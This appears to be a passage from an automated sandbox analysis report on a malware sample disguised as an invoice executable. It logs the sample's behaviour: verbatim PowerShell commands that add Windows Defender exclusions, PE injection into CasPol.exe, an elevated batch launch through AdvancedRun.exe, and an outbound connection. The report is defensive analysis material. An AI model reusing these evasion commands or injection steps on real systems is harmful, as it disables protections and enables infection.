        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeNetwork Connect: 172.67.172.17 80
        Adds a directory exclusion to Windows DefenderShow sources
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 420000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 422000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 79C008
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.943989994.0000000002E8E000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.933373358.0000000001260000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.933373358.0000000001260000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: CasPol.exe, 0000000D.00000002.941774576.0000000002CF8000.00000004.00000001.sdmpBinary or memory string: Program Managerx
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.933373358.0000000001260000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: CasPol.exe, 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: Program Manager`
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeQueries volume information: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
